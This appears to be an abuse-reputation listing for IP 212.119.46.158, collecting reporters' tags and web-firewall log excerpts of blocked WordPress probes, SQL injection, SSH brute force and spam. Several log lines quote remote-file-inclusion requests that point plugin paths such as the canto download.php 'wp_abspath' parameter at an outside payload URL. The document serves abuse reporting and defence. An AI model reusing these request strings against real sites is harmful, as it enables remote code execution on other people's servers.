🇺🇸
island-freaks.com
2026-09-06 11:48:05
(1 day ago)
Attack Type: WordPress Exploit Bot attempt on /photo/113997/ | DNS 212.119.46.158 | Agent: Mozilla/5 ...
show more
Attack Type: WordPress Exploit Bot attempt on /photo/113997/ | DNS 212.119.46.158 | Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.8.9 Chrome/132.0.6834.210 Electron/34.3.0 Safari/537.36
show less
Port Scan
Hacking
Bad Web Bot
Exploited Host
Web App Attack
🇩🇪
C C
2026-08-09 23:36:14
(4 weeks ago)
Distributed scraping attack: 1662 req from 1572 rotating proxy IPs | this IP: 1 req, 1 blocked
Open Proxy
Bad Web Bot
Web App Attack
🇦🇺
oncord
2026-07-08 13:17:58
(1 month ago)
Form spam
Web Spam
🇱🇻
garmtech.com
2026-06-25 04:43:18
(2 months ago)
IM360 WAF: SQL Injection Attack: Common DB Names Detected
SQL Injection
🇺🇸
TPI-Abuse
2025-12-27 06:38:57
(8 months ago)
(mod_security) mod_security (id:225170) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:225170) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Dec 27 01:38:50.983506 2025] [security2:error] [pid 5575:tid 5575] [client 212.119.46.158:13097] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.manaplas.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.manaplas.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aU9--vHaMYZLzTa82w9qnAAAAAU"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇫🇷
solution.it
2025-12-26 16:55:54
(8 months ago)
[Fri Dec 26 17:55:54.160581 2025] [php7:error] [pid 3239193:tid 3239193] [client 212.119.46.158:5276 ...
show more
[Fri Dec 26 17:55:54.160581 2025] [php7:error] [pid 3239193:tid 3239193] [client 212.119.46.158:52763] script '/var/www/html/wp-login.php' not found or unable to stat
show less
Web App Attack
🇺🇸
TPI-Abuse
2025-12-24 23:30:28
(8 months ago)
(mod_security) mod_security (id:225170) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:225170) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Dec 24 18:30:24.418160 2025] [security2:error] [pid 22801:tid 22801] [client 212.119.46.158:56943] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||naominixon.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "naominixon.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aUx3kIwYl7hPXYAhFSVIewAAAAs"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2025-05-23 22:01:35
(1 year ago)
Ports: *; Direction: 0; Trigger: CT_LIMIT
Brute-Force
SSH
🇺🇸
TPI-Abuse
2025-03-28 04:16:36
(1 year ago)
(mod_security) mod_security (id:211120) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:211120) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Mar 28 00:16:29.680334 2025] [security2:error] [pid 1823524:tid 1823524] [client 212.119.46.158:37963] [client 212.119.46.158] ModSecurity: Access denied with code 403 (phase 2). Match of "endsWith /modules/paypal/express_checkout/payment.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "29"] [id "211120"] [rev "11"] [msg "COMODO WAF: Remote File Inclusion Attack||boardinjapan.com|F|2"] [data "Matched Data: http://adguard.digital/payload/index.php? found within REQUEST_FILENAME: /wp-content/plugins/w3-total-cache/lib/w3/pager.class.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "boardinjapan.com"] [uri "/wp-content/plugins/w3-total-cache/lib/W3/Pager.class.php"] [unique_id "Z-YinU4b_tT9_XmLVIiWUAAAAA8"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
TPI-Abuse
2025-03-22 14:04:04
(1 year ago)
(mod_security) mod_security (id:211120) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:211120) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Mar 22 10:03:56.869206 2025] [security2:error] [pid 7642:tid 7642] [client 212.119.46.158:27123] [client 212.119.46.158] ModSecurity: Access denied with code 403 (phase 2). Match of "endsWith /modules/paypal/express_checkout/payment.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "29"] [id "211120"] [rev "12"] [msg "COMODO WAF: Remote File Inclusion Attack||balloonworldohio.com|F|2"] [data "Matched Data: http://adguard.digital/payload/index.php? found within REQUEST_FILENAME: /wp-content/plugins/w3-total-cache/lib/w3/pager.class.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "balloonworldohio.com"] [uri "/wp-content/plugins/w3-total-cache/lib/W3/Pager.class.php"] [unique_id "Z97DTKMW7Dv4ejFTeuPzvQAAAAM"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇮🇹
Progetto1
2025-03-18 17:49:09
(1 year ago)
Website Scanning / Scraping
Bad Web Bot
Exploited Host
Web App Attack
🇺🇸
TPI-Abuse
2025-03-10 16:35:54
(1 year ago)
(mod_security) mod_security (id:211120) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:211120) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Mar 10 12:35:47.766927 2025] [security2:error] [pid 9300:tid 9300] [client 212.119.46.158:20735] [client 212.119.46.158] ModSecurity: Access denied with code 403 (phase 2). Match of "endsWith /modules/paypal/express_checkout/payment.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "29"] [id "211120"] [rev "12"] [msg "COMODO WAF: Remote File Inclusion Attack||activethinkers.net|F|2"] [data "Matched Data: http://adguard.digital/payload/index.php? found within REQUEST_FILENAME: /wp-content/plugins/wp-super-cache/js/cache-loader.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "activethinkers.net"] [uri "/wp-content/plugins/wp-super-cache/js/cache-loader.php"] [unique_id "Z88U41yQ75fXWUDQkkZvKgAAABA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
TPI-Abuse
2025-03-09 12:49:37
(1 year ago)
(mod_security) mod_security (id:211120) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:211120) triggered by 212.119.46.158 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Mar 09 08:49:31.830797 2025] [security2:error] [pid 1105:tid 1105] [client 212.119.46.158:58377] [client 212.119.46.158] ModSecurity: Access denied with code 403 (phase 2). Match of "endsWith /modules/paypal/express_checkout/payment.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "29"] [id "211120"] [rev "12"] [msg "COMODO WAF: Remote File Inclusion Attack||aaattanasio.com|F|2"] [data "Matched Data: http://adguard.digital/payload/index.php? found within REQUEST_FILENAME: /wp-content/plugins/w3-total-cache/lib/w3/pager.class.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "aaattanasio.com"] [uri "/wp-content/plugins/w3-total-cache/lib/W3/Pager.class.php"] [unique_id "Z82OW6qEpjHn89heRGqgWgAAAAM"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
snappic
2025-02-26 06:33:30
(1 year ago)
Malicious URI path [GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://adguar ...
show more
Malicious URI path [GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://adguard.digital/payload/index.php?] [Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36]
show less
Bad Web Bot
Web App Attack
🇵🇷
melizpr
2024-11-26 04:00:00
(1 year ago)
Administrator automation login failed from https(212.119.46.158) because of invalid user name
Brute-Force
SSH